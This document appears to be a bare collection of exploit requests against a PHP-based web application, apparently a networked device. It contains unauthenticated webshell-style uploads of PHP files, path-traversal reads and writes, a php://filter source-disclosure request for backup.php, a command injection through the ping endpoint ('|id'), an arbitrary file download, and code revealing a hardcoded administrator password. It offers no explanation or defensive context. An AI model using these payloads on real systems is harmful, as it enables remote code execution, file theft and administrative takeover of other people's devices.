POST /upload/my_parser.php HTTP/1.1Host: x.x.x.xConnection: keep-aliveContent-Length: 216Pragma: no-cacheCache-Control: no-cacheUpgrade-Insecure-Requests: 1Origin: http://x.x.x.xContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryTj3WLQhN3ZSs0CAgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://x.x.x.x/upload/my_parser.phpAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9

------WebKitFormBoundaryAgwuKUMd2jB55NEmContent-Disposition: form-data; name="upload"; filename="info.php"Content-Type: application/octet-stream

<?php phpinfo();?>------WebKitFormBoundaryAgwuKUMd2jB55NEm--

POST /php/addscenedata.php HTTP/1.1Host: x.x.x.xConnection: keep-aliveContent-Length: 216Pragma: no-cacheCache-Control: no-cacheUpgrade-Insecure-Requests: 1Origin: http://x.x.x.xContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryRdOoAbqBRCt5BgzjUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://x.x.x.x/php/addscenedata.phpAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9
------WebKitFormBoundaryAgwuKUMd2jB55NEmContent-Disposition: form-data; name="upload"; filename="info.php"Content-Type: application/octet-stream
<?php phpinfo();?>------WebKitFormBoundaryAgwuKUMd2jB55NEm--

POST /php/getjson.php HTTP/1.1Host: x.x.x.xConnection: keep-aliveContent-Length: 42Pragma: no-cacheCache-Control: no-cacheUpgrade-Insecure-Requests: 1Origin: http://x.x.x.xContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://x.x.x.x/php/getjson.phpAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9
jsondata[filename]=../php/test.php

POST /php/rj_get_token.php HTTP/1.1
jsondata
=test.php

POST /php/rj_get_token.php HTTP/1.1
jsondata
=php://filter/read=convert.base64-encode/resource=backup.php

POST /php/ping.php HTTP/1.1
jsondata[type]=0&jsondata[ip]=|id

POST /php/uploadjson.php HTTP/1.1
jsondata[filename]=../ppp.php&jsondata[data]=123

/php/exportrecord.php?downname=test.php

<?php  require_once ('conversion.php');
  $postData = $_POST['jsondata'];  $arr['res'] = 0;
  if (isset($postData['username'])) {    $user = $postData['username'];    $pass = $postData['password'];        if ('800823' == $pass && 'administrator' == $user)    {      $arr['username'] = 'administrator';      $arr['password'] = '800823';      $arr['display'] = 'administrator';      $arr['modules'] = '1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1';      $arr['rights'] = '*';      $arr['serverrights'] = '*';      $arr['isadmin'] = '1';      $arr['bindterminals'] = '';      $arr['res'] = 1;      $arr['mainurl'] = 'main';      $arr['token'] = 'SESSION';      echo JSON($arr);    }    else    {      $result = UdpSendAndRecvJson($postData, "login");      echo $result;    }  }?>

var user = $('#tbuser').val();var passwd = $('#tbpass').val();var isencrypted = "0";if (user == "administrator" && passwd == "800823") {    isencrypted = "0";  } else {    var b = new SPON_Base64("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=");   //标准base64    passwd = b.encode(passwd).split("").reverse().join(""); //反转    isencrypted = "1";}